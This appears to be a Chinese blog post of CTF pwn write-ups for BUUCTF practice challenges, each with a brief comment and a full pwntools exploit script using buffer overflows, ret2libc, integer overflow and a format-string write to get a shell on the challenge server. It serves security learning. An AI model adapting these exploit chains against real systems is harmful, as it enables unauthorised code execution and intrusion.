not_the_same_3dsctf_2016跟前面一道题比较类似
from pwn import *from LibcSearcher import *context.log_level = 'debug'#context(os='linux', arch='amd64')#p = process('./1')p = remote('node4.buuoj.cn', 28016)elf = ELF('1')get_secret_addr = elf.symbols['get_secret']exit_addr = elf.symbols['exit']write_addr = elf.symbols['write']flag_addr = 0x080ECA2Dpayload = b'a'*45 + p32(get_secret_addr) + p32(write_addr) + p32(exit_addr) + p32(1) + p32(flag_addr) + p32(0x100)p.sendline(payload)print(p.recv())ciscn_2019_n_5裸的 ret2libcfrom pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 26628)elf = ELF('pwn')ret = 0x00000000004004c9rdi = 0x0000000000400713p.sendlineafter(b'tell me your name\n', 'w1nd')payload = b'a'*0x28 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])p.sendlineafter(b'What do you want to say to me?\n', payload)puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))libc = ELF('buu/libc-2.27-x64.so')libcbase = puts_addr - libc.sym['puts']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))p.sendlineafter(b'tell me your name\n', 'w1nd')payload = b'a'*0x28 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)p.sendlineafter(b'What do you want to say to me?\n', payload)p.interactive()others_shellcode直接 nc
execve 系统调用
文章插图
ciscn_2019_ne_5
文章插图
这里的 strcpy 函数导致了栈溢出漏洞
在构造payload的时候,记得system函数地址后的返回地址四个字节不能有一个为零 , 否则strcpy函数复制的时候遇到 \x00 就不继续复制了
from pwn import *from LibcSearcher import *#context.log_level = 'debug'#context(os='linux', arch='amd64')#p = process('./1')p = remote("node4.buuoj.cn", 29577)elf = ELF('1')system_addr = elf.symbols['system']sh_addr = next(elf.search(b'sh\x00'))ret = 0x0804843ep.sendlineafter('Please input admin password', 'administrator')p.sendlineafter('0.Exit\n:', '1')payload = b'a'*(0x48+4) + p32(system_addr) + b'a'*4 + p32(sh_addr) #所以这里写成了 b'a'*4p.sendlineafter('Please input new log info:', payload)p.sendlineafter('0.Exit\n:', '4')p.interactive()铁人三项(第五赛区)_2018_rop这里用 write 泄露 libc,其它都很寻常的 ret2libc
from pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 29939)elf = ELF('pwn')payload = b'a'*0x8c + p32(elf.sym['write']) + p32(elf.sym['main']) + p32(1) + p32(elf.got['write']) + p32(0x4)p.sendline(payload)write_addr = u32(p.recv())libc = ELF('buu/libc-2.27.so')libcbase = write_addr - libc.sym['write']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))payload = b'a'*0x8c + p32(system) + p32(0) + p32(binsh)p.sendline(payload)p.interactive()bjdctf_2020_babyrop普通的 ret2libcfrom pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 26698)elf = ELF('pwn')rdi = 0x400733ret = 0x4004c9payload = b'a'*0x28 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])p.sendlineafter(b'story!\n', payload)puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))libc = ELF('buu/libc-2.23-x64.so')libcbase = puts_addr - libc.sym['puts']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))payload = b'a'*0x28 + p64(rdi) + p64(binsh) + p64(system)p.sendlineafter(b'story!\n', payload)p.interactive()bjdctf_2020_babystack2简单的整数溢出和ret2textfrom pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 27408)elf = ELF('pwn')p.sendlineafter(b'your name:\n', '-1')payload = b'a'*0x18 + p64(elf.sym['backdoor'])p.sendlineafter(b'u name?\n', payload)p.interactive()jarvisoj_fm格式化字符串漏洞
调试可知是第十一个参数
文章插图
exp
from pwn import *from LibcSearcher import *context.log_level='debug'p = process('pwn')#p = remote('node4.buuoj.cn', 26628)elf = ELF('pwn')x_addr = 0x804A02C#payload = fmtstr_payload(11,{x_addr:4})payload = p32(x_addr) + b'%11$n'p.sendline(payload)#print(p.recv())p.interactive()pwn2_sctf_2016简单的整数溢出和 ret2libc,但是坑的是
最后调用 system('/bin/sh') 的时候 , 如果用 p32(0) 会导致打不通看汇编代码才发现,原来程序读字符串用的是自定义的 get_n 函数
文章插图
读到 \x00 它就断了
from pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 25339)elf = ELF('pwn')p.sendlineafter(b'to read?', b'-1')payload = b'a'*0x30 + p32(elf.plt['printf']) + p32(elf.sym['main']) + p32(0x80486F8) +p32(elf.got['printf'])p.sendlineafter(b'bytes of data!\n', payload)p.recvline()p.recvuntil(b'You said: ')printf_addr = u32(p.recv(4))libc = ELF('buu/libc-2.23.so')libcbase = printf_addr - libc.sym['printf']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))p.sendlineafter(b'to read?', b'-1')payload = b'a'*0x30 + p32(system) + b'a'*4 + p32(binsh) #注意这里p.sendlineafter(b'bytes of data!\n', payload)p.interactive()
推荐阅读
- 沈阳 第 46 届 ICPC 国际大学生程序设计竞赛亚洲区域赛
- 原神寻星之旅第五天怎么通关
- 新剑侠情缘10月26日微信每日一题答案是什么
- 去细纹眼霜前8强:希思黎上榜 第一名可有效阻止电子辐射
- .Net Framework中的AppDomain.AssemblyResolve事件的常见用法、问题,以及解决办法
- 王者荣耀10月26日微信每日一题答案是什么
- 最贵的口红品牌排行 第一被誉为口红界的女王
- 原神寻星之旅第六天怎么通关
- 黑色沙漠10月27日微信每日一题答案是什么
- 王者荣耀10月27日微信每日一题答案是什么